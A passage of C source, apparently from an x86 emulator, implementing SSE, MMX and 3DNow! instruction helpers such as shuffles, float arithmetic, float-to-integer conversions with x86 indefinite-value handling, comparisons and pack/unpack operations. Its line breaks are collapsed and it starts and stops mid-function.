helper_shufps(Reg *d, Reg *s, int order) { Reg r; r.L(0) = d->L(order & 3); r.L(1) = d->L((order >> 2) & 3); r.L(2) = s->L((order >> 4) & 3); r.L(3) = s->L((order >> 6) & 3); *d = r; } void helper_shufpd(Reg *d, Reg *s, int order) { Reg r; r.Q(0) = d->Q(order & 1); r.Q(1) = s->Q((order >> 1) & 1); *d = r; } void glue(helper_pshufd, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.L(0) = s->L(order & 3); r.L(1) = s->L((order >> 2) & 3); r.L(2) = s->L((order >> 4) & 3); r.L(3) = s->L((order >> 6) & 3); *d = r; } void glue(helper_pshuflw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.W(0) = s->W(order & 3); r.W(1) = s->W((order >> 2) & 3); r.W(2) = s->W((order >> 4) & 3); r.W(3) = s->W((order >> 6) & 3); r.Q(1) = s->Q(1); *d = r; } void glue(helper_pshufhw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.Q(0) = s->Q(0); r.W(4) = s->W(4 + (order & 3)); r.W(5) = s->W(4 + ((order >> 2) & 3)); r.W(6) = s->W(4 + ((order >> 4) & 3)); r.W(7) = s->W(4 + ((order >> 6) & 3)); *d = r; } #endif #if SHIFT == 1 /* FPU ops */ /* XXX: not accurate */ #define SSE_HELPER_S(name, F) \ void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_S(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ d->ZMM_S(1) = F(32, d->ZMM_S(1), s->ZMM_S(1)); \ d->ZMM_S(2) = F(32, d->ZMM_S(2), s->ZMM_S(2)); \ d->ZMM_S(3) = F(32, d->ZMM_S(3), s->ZMM_S(3)); \ } \ \ void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_S(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ } \ \ void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_D(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ d->ZMM_D(1) = F(64, d->ZMM_D(1), s->ZMM_D(1)); \ } \ \ void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_D(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ } #define FPU_ADD(size, a, b) float ## size ## _add(a, b, &env->sse_status) #define FPU_SUB(size, a, b) float ## size ## _sub(a, b, &env->sse_status) #define FPU_MUL(size, a, b) float ## size ## _mul(a, b, &env->sse_status) #define FPU_DIV(size, a, b) float ## size ## _div(a, b, &env->sse_status) #define FPU_SQRT(size, a, b) float ## size ## _sqrt(b, &env->sse_status) /* Note that the choice of comparison op here is important to get the * special cases right: for min and max Intel specifies that (-0,0), * (NaN, anything) and (anything, NaN) return the second argument. */ #define FPU_MIN(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? (a) : (b)) #define FPU_MAX(size, a, b) \ (float ## size ## _lt(b, a, &env->sse_status) ? (a) : (b)) SSE_HELPER_S(add, FPU_ADD) SSE_HELPER_S(sub, FPU_SUB) SSE_HELPER_S(mul, FPU_MUL) SSE_HELPER_S(div, FPU_DIV) SSE_HELPER_S(min, FPU_MIN) SSE_HELPER_S(max, FPU_MAX) SSE_HELPER_S(sqrt, FPU_SQRT) /* float to float conversions */ void helper_cvtps2pd(CPUX86State *env, Reg *d, Reg *s) { float32 s0, s1; s0 = s->ZMM_S(0); s1 = s->ZMM_S(1); d->ZMM_D(0) = float32_to_float64(s0, &env->sse_status); d->ZMM_D(1) = float32_to_float64(s1, &env->sse_status); } void helper_cvtpd2ps(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = float64_to_float32(s->ZMM_D(0), &env->sse_status); d->ZMM_S(1) = float64_to_float32(s->ZMM_D(1), &env->sse_status); d->Q(1) = 0; } void helper_cvtss2sd(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_D(0) = float32_to_float64(s->ZMM_S(0), &env->sse_status); } void helper_cvtsd2ss(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = float64_to_float32(s->ZMM_D(0), &env->sse_status); } /* integer to float */ void helper_cvtdq2ps(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = int32_to_float32(s->ZMM_L(0), &env->sse_status); d->ZMM_S(1) = int32_to_float32(s->ZMM_L(1), &env->sse_status); d->ZMM_S(2) = int32_to_float32(s->ZMM_L(2), &env->sse_status); d->ZMM_S(3) = int32_to_float32(s->ZMM_L(3), &env->sse_status); } void helper_cvtdq2pd(CPUX86State *env, Reg *d, Reg *s) { int32_t l0, l1; l0 = (int32_t)s->ZMM_L(0); l1 = (int32_t)s->ZMM_L(1); d->ZMM_D(0) = int32_to_float64(l0, &env->sse_status); d->ZMM_D(1) = int32_to_float64(l1, &env->sse_status); } void helper_cvtpi2ps(CPUX86State *env, ZMMReg *d, MMXReg *s) { d->ZMM_S(0) = int32_to_float32(s->MMX_L(0), &env->sse_status); d->ZMM_S(1) = int32_to_float32(s->MMX_L(1), &env->sse_status); } void helper_cvtpi2pd(CPUX86State *env, ZMMReg *d, MMXReg *s) { d->ZMM_D(0) = int32_to_float64(s->MMX_L(0), &env->sse_status); d->ZMM_D(1) = int32_to_float64(s->MMX_L(1), &env->sse_status); } void helper_cvtsi2ss(CPUX86State *env, ZMMReg *d, uint32_t val) { d->ZMM_S(0) = int32_to_float32(val, &env->sse_status); } void helper_cvtsi2sd(CPUX86State *env, ZMMReg *d, uint32_t val) { d->ZMM_D(0) = int32_to_float64(val, &env->sse_status); } #ifdef TARGET_X86_64 void helper_cvtsq2ss(CPUX86State *env, ZMMReg *d, uint64_t val) { d->ZMM_S(0) = int64_to_float32(val, &env->sse_status); } void helper_cvtsq2sd(CPUX86State *env, ZMMReg *d, uint64_t val) { d->ZMM_D(0) = int64_to_float64(val, &env->sse_status); } #endif /* float to integer */ /* * x86 mandates that we return the indefinite integer value for the result * of any float-to-integer conversion that raises the 'invalid' exception. * Wrap the softfloat functions to get this behaviour. */ #define WRAP_FLOATCONV(RETTYPE, FN, FLOATTYPE, INDEFVALUE) \ static inline RETTYPE x86_##FN(FLOATTYPE a, float_status *s) \ { \ int oldflags, newflags; \ RETTYPE r; \ \ oldflags = get_float_exception_flags(s); \ set_float_exception_flags(0, s); \ r = FN(a, s); \ newflags = get_float_exception_flags(s); \ if (newflags & float_flag_invalid) { \ r = INDEFVALUE; \ } \ set_float_exception_flags(newflags | oldflags, s); \ return r; \ } WRAP_FLOATCONV(int32_t, float32_to_int32, float32, INT32_MIN) WRAP_FLOATCONV(int32_t, float32_to_int32_round_to_zero, float32, INT32_MIN) WRAP_FLOATCONV(int32_t, float64_to_int32, float64, INT32_MIN) WRAP_FLOATCONV(int32_t, float64_to_int32_round_to_zero, float64, INT32_MIN) WRAP_FLOATCONV(int64_t, float32_to_int64, float32, INT64_MIN) WRAP_FLOATCONV(int64_t, float32_to_int64_round_to_zero, float32, INT64_MIN) WRAP_FLOATCONV(int64_t, float64_to_int64, float64, INT64_MIN) WRAP_FLOATCONV(int64_t, float64_to_int64_round_to_zero, float64, INT64_MIN) void helper_cvtps2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); d->ZMM_L(1) = x86_float32_to_int32(s->ZMM_S(1), &env->sse_status); d->ZMM_L(2) = x86_float32_to_int32(s->ZMM_S(2), &env->sse_status); d->ZMM_L(3) = x86_float32_to_int32(s->ZMM_S(3), &env->sse_status); } void helper_cvtpd2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); d->ZMM_L(1) = x86_float64_to_int32(s->ZMM_D(1), &env->sse_status); d->ZMM_Q(1) = 0; } void helper_cvtps2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); d->MMX_L(1) = x86_float32_to_int32(s->ZMM_S(1), &env->sse_status); } void helper_cvtpd2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); d->MMX_L(1) = x86_float64_to_int32(s->ZMM_D(1), &env->sse_status); } int32_t helper_cvtss2si(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); } int32_t helper_cvtsd2si(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); } #ifdef TARGET_X86_64 int64_t helper_cvtss2sq(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int64(s->ZMM_S(0), &env->sse_status); } int64_t helper_cvtsd2sq(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int64(s->ZMM_D(0), &env->sse_status); } #endif /* float to integer truncated */ void helper_cvttps2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); d->ZMM_L(1) = x86_float32_to_int32_round_to_zero(s->ZMM_S(1), &env->sse_status); d->ZMM_L(2) = x86_float32_to_int32_round_to_zero(s->ZMM_S(2), &env->sse_status); d->ZMM_L(3) = x86_float32_to_int32_round_to_zero(s->ZMM_S(3), &env->sse_status); } void helper_cvttpd2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); d->ZMM_L(1) = x86_float64_to_int32_round_to_zero(s->ZMM_D(1), &env->sse_status); d->ZMM_Q(1) = 0; } void helper_cvttps2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); d->MMX_L(1) = x86_float32_to_int32_round_to_zero(s->ZMM_S(1), &env->sse_status); } void helper_cvttpd2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); d->MMX_L(1) = x86_float64_to_int32_round_to_zero(s->ZMM_D(1), &env->sse_status); } int32_t helper_cvttss2si(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); } int32_t helper_cvttsd2si(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); } #ifdef TARGET_X86_64 int64_t helper_cvttss2sq(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int64_round_to_zero(s->ZMM_S(0), &env->sse_status); } int64_t helper_cvttsd2sq(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int64_round_to_zero(s->ZMM_D(0), &env->sse_status); } #endif void helper_rsqrtps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, float32_sqrt(s->ZMM_S(0), &env->sse_status), &env->sse_status); d->ZMM_S(1) = float32_div(float32_one, float32_sqrt(s->ZMM_S(1), &env->sse_status), &env->sse_status); d->ZMM_S(2) = float32_div(float32_one, float32_sqrt(s->ZMM_S(2), &env->sse_status), &env->sse_status); d->ZMM_S(3) = float32_div(float32_one, float32_sqrt(s->ZMM_S(3), &env->sse_status), &env->sse_status); } void helper_rsqrtss(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, float32_sqrt(s->ZMM_S(0), &env->sse_status), &env->sse_status); } void helper_rcpps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_div(float32_one, s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_div(float32_one, s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_div(float32_one, s->ZMM_S(3), &env->sse_status); } void helper_rcpss(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, s->ZMM_S(0), &env->sse_status); } static inline uint64_t helper_extrq(uint64_t src, int shift, int len) { uint64_t mask; if (len == 0) { mask = ~0LL; } else { mask = (1ULL << len) - 1; } return (src >> shift) & mask; } void helper_extrq_r(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_Q(0) = helper_extrq(d->ZMM_Q(0), s->ZMM_B(1), s->ZMM_B(0)); } void helper_extrq_i(CPUX86State *env, ZMMReg *d, int index, int length) { d->ZMM_Q(0) = helper_extrq(d->ZMM_Q(0), index, length); } static inline uint64_t helper_insertq(uint64_t src, int shift, int len) { uint64_t mask; if (len == 0) { mask = ~0ULL; } else { mask = (1ULL << len) - 1; } return (src & ~(mask << shift)) | ((src & mask) << shift); } void helper_insertq_r(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_Q(0) = helper_insertq(s->ZMM_Q(0), s->ZMM_B(9), s->ZMM_B(8)); } void helper_insertq_i(CPUX86State *env, ZMMReg *d, int index, int length) { d->ZMM_Q(0) = helper_insertq(d->ZMM_Q(0), index, length); } void helper_haddps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_S(0) = float32_add(d->ZMM_S(0), d->ZMM_S(1), &env->sse_status); r.ZMM_S(1) = float32_add(d->ZMM_S(2), d->ZMM_S(3), &env->sse_status); r.ZMM_S(2) = float32_add(s->ZMM_S(0), s->ZMM_S(1), &env->sse_status); r.ZMM_S(3) = float32_add(s->ZMM_S(2), s->ZMM_S(3), &env->sse_status); *d = r; } void helper_haddpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_D(0) = float64_add(d->ZMM_D(0), d->ZMM_D(1), &env->sse_status); r.ZMM_D(1) = float64_add(s->ZMM_D(0), s->ZMM_D(1), &env->sse_status); *d = r; } void helper_hsubps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_S(0) = float32_sub(d->ZMM_S(0), d->ZMM_S(1), &env->sse_status); r.ZMM_S(1) = float32_sub(d->ZMM_S(2), d->ZMM_S(3), &env->sse_status); r.ZMM_S(2) = float32_sub(s->ZMM_S(0), s->ZMM_S(1), &env->sse_status); r.ZMM_S(3) = float32_sub(s->ZMM_S(2), s->ZMM_S(3), &env->sse_status); *d = r; } void helper_hsubpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_D(0) = float64_sub(d->ZMM_D(0), d->ZMM_D(1), &env->sse_status); r.ZMM_D(1) = float64_sub(s->ZMM_D(0), s->ZMM_D(1), &env->sse_status); *d = r; } void helper_addsubps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_sub(d->ZMM_S(0), s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_add(d->ZMM_S(1), s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_sub(d->ZMM_S(2), s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_add(d->ZMM_S(3), s->ZMM_S(3), &env->sse_status); } void helper_addsubpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_D(0) = float64_sub(d->ZMM_D(0), s->ZMM_D(0), &env->sse_status); d->ZMM_D(1) = float64_add(d->ZMM_D(1), s->ZMM_D(1), &env->sse_status); } /* XXX: unordered */ #define SSE_HELPER_CMP(name, F) \ void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_L(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ d->ZMM_L(1) = F(32, d->ZMM_S(1), s->ZMM_S(1)); \ d->ZMM_L(2) = F(32, d->ZMM_S(2), s->ZMM_S(2)); \ d->ZMM_L(3) = F(32, d->ZMM_S(3), s->ZMM_S(3)); \ } \ \ void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_L(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ } \ \ void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_Q(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ d->ZMM_Q(1) = F(64, d->ZMM_D(1), s->ZMM_D(1)); \ } \ \ void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_Q(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ } #define FPU_CMPEQ(size, a, b) \ (float ## size ## _eq_quiet(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPLT(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPLE(size, a, b) \ (float ## size ## _le(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPUNORD(size, a, b) \ (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPNEQ(size, a, b) \ (float ## size ## _eq_quiet(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPNLT(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPNLE(size, a, b) \ (float ## size ## _le(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPORD(size, a, b) \ (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? 0 : -1) SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) SSE_HELPER_CMP(cmplt, FPU_CMPLT) SSE_HELPER_CMP(cmple, FPU_CMPLE) SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) SSE_HELPER_CMP(cmpord, FPU_CMPORD) static const int comis_eflags[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; void helper_ucomiss(CPUX86State *env, Reg *d, Reg *s) { int ret; float32 s0, s1; s0 = d->ZMM_S(0); s1 = s->ZMM_S(0); ret = float32_compare_quiet(s0, s1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_comiss(CPUX86State *env, Reg *d, Reg *s) { int ret; float32 s0, s1; s0 = d->ZMM_S(0); s1 = s->ZMM_S(0); ret = float32_compare(s0, s1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_ucomisd(CPUX86State *env, Reg *d, Reg *s) { int ret; float64 d0, d1; d0 = d->ZMM_D(0); d1 = s->ZMM_D(0); ret = float64_compare_quiet(d0, d1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_comisd(CPUX86State *env, Reg *d, Reg *s) { int ret; float64 d0, d1; d0 = d->ZMM_D(0); d1 = s->ZMM_D(0); ret = float64_compare(d0, d1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } uint32_t helper_movmskps(CPUX86State *env, Reg *s) { int b0, b1, b2, b3; b0 = s->ZMM_L(0) >> 31; b1 = s->ZMM_L(1) >> 31; b2 = s->ZMM_L(2) >> 31; b3 = s->ZMM_L(3) >> 31; return b0 | (b1 << 1) | (b2 << 2) | (b3 << 3); } uint32_t helper_movmskpd(CPUX86State *env, Reg *s) { int b0, b1; b0 = s->ZMM_L(1) >> 31; b1 = s->ZMM_L(3) >> 31; return b0 | (b1 << 1); } #endif uint32_t glue(helper_pmovmskb, SUFFIX)(CPUX86State *env, Reg *s) { uint32_t val; val = 0; val |= (s->B(0) >> 7); val |= (s->B(1) >> 6) & 0x02; val |= (s->B(2) >> 5) & 0x04; val |= (s->B(3) >> 4) & 0x08; val |= (s->B(4) >> 3) & 0x10; val |= (s->B(5) >> 2) & 0x20; val |= (s->B(6) >> 1) & 0x40; val |= (s->B(7)) & 0x80; #if SHIFT == 1 val |= (s->B(8) << 1) & 0x0100; val |= (s->B(9) << 2) & 0x0200; val |= (s->B(10) << 3) & 0x0400; val |= (s->B(11) << 4) & 0x0800; val |= (s->B(12) << 5) & 0x1000; val |= (s->B(13) << 6) & 0x2000; val |= (s->B(14) << 7) & 0x4000; val |= (s->B(15) << 8) & 0x8000; #endif return val; } void glue(helper_packsswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.B(0) = satsb((int16_t)d->W(0)); r.B(1) = satsb((int16_t)d->W(1)); r.B(2) = satsb((int16_t)d->W(2)); r.B(3) = satsb((int16_t)d->W(3)); #if SHIFT == 1 r.B(4) = satsb((int16_t)d->W(4)); r.B(5) = satsb((int16_t)d->W(5)); r.B(6) = satsb((int16_t)d->W(6)); r.B(7) = satsb((int16_t)d->W(7)); #endif r.B((4 << SHIFT) + 0) = satsb((int16_t)s->W(0)); r.B((4 << SHIFT) + 1) = satsb((int16_t)s->W(1)); r.B((4 << SHIFT) + 2) = satsb((int16_t)s->W(2)); r.B((4 << SHIFT) + 3) = satsb((int16_t)s->W(3)); #if SHIFT == 1 r.B(12) = satsb((int16_t)s->W(4)); r.B(13) = satsb((int16_t)s->W(5)); r.B(14) = satsb((int16_t)s->W(6)); r.B(15) = satsb((int16_t)s->W(7)); #endif *d = r; } void glue(helper_packuswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.B(0) = satub((int16_t)d->W(0)); r.B(1) = satub((int16_t)d->W(1)); r.B(2) = satub((int16_t)d->W(2)); r.B(3) = satub((int16_t)d->W(3)); #if SHIFT == 1 r.B(4) = satub((int16_t)d->W(4)); r.B(5) = satub((int16_t)d->W(5)); r.B(6) = satub((int16_t)d->W(6)); r.B(7) = satub((int16_t)d->W(7)); #endif r.B((4 << SHIFT) + 0) = satub((int16_t)s->W(0)); r.B((4 << SHIFT) + 1) = satub((int16_t)s->W(1)); r.B((4 << SHIFT) + 2) = satub((int16_t)s->W(2)); r.B((4 << SHIFT) + 3) = satub((int16_t)s->W(3)); #if SHIFT == 1 r.B(12) = satub((int16_t)s->W(4)); r.B(13) = satub((int16_t)s->W(5)); r.B(14) = satub((int16_t)s->W(6)); r.B(15) = satub((int16_t)s->W(7)); #endif *d = r; } void glue(helper_packssdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.W(0) = satsw(d->L(0)); r.W(1) = satsw(d->L(1)); #if SHIFT == 1 r.W(2) = satsw(d->L(2)); r.W(3) = satsw(d->L(3)); #endif r.W((2 << SHIFT) + 0) = satsw(s->L(0)); r.W((2 << SHIFT) + 1) = satsw(s->L(1)); #if SHIFT == 1 r.W(6) = satsw(s->L(2)); r.W(7) = satsw(s->L(3)); #endif *d = r; } #define UNPCK_OP(base_name, base) \ \ void glue(helper_punpck ## base_name ## bw, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.B(0) = d->B((base << (SHIFT + 2)) + 0); \ r.B(1) = s->B((base << (SHIFT + 2)) + 0); \ r.B(2) = d->B((base << (SHIFT + 2)) + 1); \ r.B(3) = s->B((base << (SHIFT + 2)) + 1); \ r.B(4) = d->B((base << (SHIFT + 2)) + 2); \ r.B(5) = s->B((base << (SHIFT + 2)) + 2); \ r.B(6) = d->B((base << (SHIFT + 2)) + 3); \ r.B(7) = s->B((base << (SHIFT + 2)) + 3); \ XMM_ONLY( \ r.B(8) = d->B((base << (SHIFT + 2)) + 4); \ r.B(9) = s->B((base << (SHIFT + 2)) + 4); \ r.B(10) = d->B((base << (SHIFT + 2)) + 5); \ r.B(11) = s->B((base << (SHIFT + 2)) + 5); \ r.B(12) = d->B((base << (SHIFT + 2)) + 6); \ r.B(13) = s->B((base << (SHIFT + 2)) + 6); \ r.B(14) = d->B((base << (SHIFT + 2)) + 7); \ r.B(15) = s->B((base << (SHIFT + 2)) + 7); \ ) \ *d = r; \ } \ \ void glue(helper_punpck ## base_name ## wd, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.W(0) = d->W((base << (SHIFT + 1)) + 0); \ r.W(1) = s->W((base << (SHIFT + 1)) + 0); \ r.W(2) = d->W((base << (SHIFT + 1)) + 1); \ r.W(3) = s->W((base << (SHIFT + 1)) + 1); \ XMM_ONLY( \ r.W(4) = d->W((base << (SHIFT + 1)) + 2); \ r.W(5) = s->W((base << (SHIFT + 1)) + 2); \ r.W(6) = d->W((base << (SHIFT + 1)) + 3); \ r.W(7) = s->W((base << (SHIFT + 1)) + 3); \ ) \ *d = r; \ } \ \ void glue(helper_punpck ## base_name ## dq, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.L(0) = d->L((base << SHIFT) + 0); \ r.L(1) = s->L((base << SHIFT) + 0); \ XMM_ONLY( \ r.L(2) = d->L((base << SHIFT) + 1); \ r.L(3) = s->L((base << SHIFT) + 1); \ ) \ *d = r; \ } \ \ XMM_ONLY( \ void glue(helper_punpck ## base_name ## qdq, SUFFIX)(CPUX86State \ *env, \ Reg *d, \ Reg *s) \ { \ Reg r; \ \ r.Q(0) = d->Q(base); \ r.Q(1) = s->Q(base); \ *d = r; \ } \ ) UNPCK_OP(l, 0) UNPCK_OP(h, 1) /* 3DNow! float ops */ #if SHIFT == 0 void helper_pi2fd(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = int32_to_float32(s->MMX_L(0), &env->mmx_status); d->MMX_S(1) = int32_to_float32(s->MMX_L(1), &env->mmx_status); } void helper_pi2fw(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = int32_to_float32((int16_t)s->MMX_W(0), &env->mmx_status); d->MMX_S(1) = int32_to_float32((int16_t)s->MMX_W(2), &env->mmx_status); } void helper_pf2id(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status); d->MMX_L(1) = float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status); } void helper_pf2iw(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = satsw(float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status)); d->MMX_L(1) = satsw(float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status)); } void helper_pfacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_add(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfadd(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_add(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_add(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfcmpeq(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_eq_quiet(d->MMX_S(0), s->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_eq_quiet(d->MMX_S(1), s->MMX_S(1), &env->mmx_status) ? -1 : 0; } void helper_pfcmpge(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_le(s->MMX_S(0), d->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_le(s->MMX_S(1), d->MMX_S(1), &env->mmx_status) ? -1 : 0; } void helper_pfcmpgt(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status) ? -1 : 0; } void helper_pfmax(CPUX86State *env, MMXReg *d, MMXReg *s) { if (float32_lt(d->MMX_S(0), s->MMX_S(0), &env->mmx_status)) { d->MMX_S(0) = s->MMX_S(0); } if (float32_lt(d->MMX_S(1), s->MMX_S(1), &env->mmx_status)) { d->MMX_S(1) = s->MMX_S(1); } } void helper_pfmin(CPUX86State *env, MMXReg *d, MMXReg *s) { if (float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status)) { d->MMX_S(0) = s->MMX_S(0); } if (float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status)) { d->MMX_S(1) = s->MMX_S(1); } } void helper_pfmul(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_mul(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_mul(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfnacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_sub(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfpnacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfrcp(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_div(float32_one, s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = d->MMX_S(0); } void helper_pfrsqrt(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(1) = s->MMX_L(0) & 0x7fffffff; d->MMX_S(1) = float32_div(float32_one, float32_sqrt(d->MMX_S(1), &env->mmx_status), &env->mmx_status); d->MMX_L(1) |= s->MMX_L(0) & 0x80000000; d->MMX_L(0) = d->MMX_L(1); } void helper_pfsub(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_sub(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); 